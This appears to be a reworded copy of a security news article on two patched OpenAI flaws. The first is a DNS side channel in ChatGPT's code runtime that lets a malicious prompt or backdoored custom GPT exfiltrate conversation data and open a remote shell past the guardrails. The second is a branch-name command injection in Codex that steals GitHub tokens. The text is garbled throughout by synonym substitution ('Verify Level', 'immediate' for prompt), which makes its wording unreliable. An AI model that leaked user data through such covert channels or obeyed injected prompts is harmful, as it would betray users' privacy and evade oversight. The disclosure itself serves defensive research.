HomeVulnerabilityOpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

A beforehand unknown vulnerability in OpenAI ChatGPT allowed delicate dialog information to be exfiltrated with out person data or consent, in accordance with new findings from Verify Level.

“A single malicious immediate may flip an in any other case strange dialog right into a covert exfiltration channel, leaking person messages, uploaded recordsdata, and different delicate content material,” the cybersecurity firm mentioned in a report revealed at this time. “A backdoored GPT may abuse the identical weak spot to acquire entry to person information with out the person’s consciousness or consent.”

Following accountable disclosure, OpenAI addressed the difficulty on February 20, 2026. There is no such thing as a proof that the difficulty was ever exploited in a malicious context.

Whereas ChatGPT is constructed with numerous guardrails to forestall unauthorized information sharing or generate direct outbound community requests, the newly found vulnerability bypasses these safeguards solely by exploiting a aspect channel originating from the Linux runtime utilized by the unreal intelligence (AI) agent for code execution and information evaluation.

Particularly, it abuses a hidden DNS-based communication path as a “covert transport mechanism” by encoding info into DNS requests to get round seen AI guardrails. What’s extra, the identical hidden communication path could possibly be used to ascertain distant shell entry contained in the Linux runtime and obtain command execution.

Within the absence of any warning or person approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the surroundings was remoted.

As an illustrative instance, an attacker may persuade a person to stick a malicious immediate by passing it off as a technique to unlock premium capabilities free of charge or enhance ChatGPT’s efficiency. The risk will get magnified when the method is embedded inside customized GPTs, because the malicious logic could possibly be baked into it versus tricking a person into pasting a specifically crafted immediate.

See also  Three Password Cracking Strategies and Learn how to Defend In opposition to Them

“Crucially, as a result of the mannequin operated underneath the idea that this surroundings couldn’t ship information outward straight, it didn’t acknowledge that habits as an exterior information switch requiring resistance or person mediation,” Verify Level defined. “Consequently, the leakage didn’t set off warnings about information leaving the dialog, didn’t require express person affirmation, and remained largely invisible from the person’s perspective.”

With instruments like ChatGPT more and more embedded in enterprise environments and customers importing extremely private info, vulnerabilities like these underscore the necessity for organizations to implement their very own security layer to counter immediate injections and different surprising habits in AI programs.

“This analysis reinforces a tough fact for the AI period: do not assume AI instruments are safe by default,” Eli Smadja, head of analysis at Verify Level Analysis, mentioned in an announcement shared with The Hacker Information.

“As AI platforms evolve into full computing environments dealing with our most delicate information, native security controls are not ample on their very own. Organizations want impartial visibility and layered safety between themselves and AI distributors. That is how we transfer ahead safely — by rethinking security structure for AI, not reacting to the subsequent incident.”

The event comes as risk actors have been noticed publishing net browser extensions (or updating current ones) that have interaction within the doubtful follow of immediate poaching to silently siphon AI chatbot conversations with out person consent, highlighting how seemingly innocent add-ons may turn out to be a channel for information exfiltration.

See also  Faux resumes concentrating on HR managers now include up to date backdoor

“It nearly goes with out saying that these plugins open the doorways to a number of dangers, together with identification theft, focused phishing campaigns, and delicate information being put up on the market on underground boards,” Expel researcher Ben Nahorney mentioned. “Within the case of organizations the place workers could have unwittingly put in these extensions, they could have uncovered mental property, buyer information, or different confidential info.”

Command Injection Vulnerability in OpenAI Codex Results in GitHub Token Compromise

The findings additionally coincide with the invention of a crucial command injection vulnerability in OpenAI’s Codex, a cloud-based software program engineering agent, that might have been exploited to steal GitHub credential information and finally compromise a number of customers interacting with a shared repository.

“The vulnerability exists throughout the job creation HTTP request, which permits an attacker to smuggle arbitrary instructions by way of the GitHub department identify parameter,” BeyondTrust Phantom Labs researcher Tyler Jespersen mentioned in a report shared with The Hacker Information. “This can lead to the theft of a sufferer’s GitHub Consumer Entry Token – the identical token Codex makes use of to authenticate with GitHub.”

The problem, per BeyondTrust, stems from improper enter sanitization when processing GitHub department names throughout job execution on the cloud. Due to this inadequacy, an attacker may inject arbitrary instructions by way of the department identify parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads contained in the agent’s container, and retrieve delicate authentication tokens.

See also  Vital WhisperPair flaw lets hackers observe, eavesdrop by way of Bluetooth audio units

“This granted lateral motion and browse/write entry to a sufferer’s complete codebase,” Kinnaird McQuade, chief security architect at BeyondTrust, mentioned in a publish on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability impacts the ChatGPT web site, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor mentioned the department command injection method is also prolonged to steal GitHub Set up Entry tokens and execute bash instructions on the code assessment container at any time when @codex is referenced in GitHub. 

“With the malicious department arrange, we referenced Codex in a touch upon a pull request (PR),” it defined. “Codex then initiated a code assessment container and created a job towards our repository and department, executing our payload and forwarding the response to our exterior server.”

The analysis additionally highlights a rising threat the place the privileged entry granted to AI coding brokers might be weaponized to supply a “scalable assault path” into enterprise programs with out triggering conventional security controls.

“As AI brokers turn out to be extra deeply built-in into developer workflows, the security of the containers they run in – and the enter they eat – should be handled with the identical rigor as some other software security boundary,” BeyondTrust mentioned. “The assault floor is increasing, and the security of those environments must hold tempo.”

- Advertisment -spot_img
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular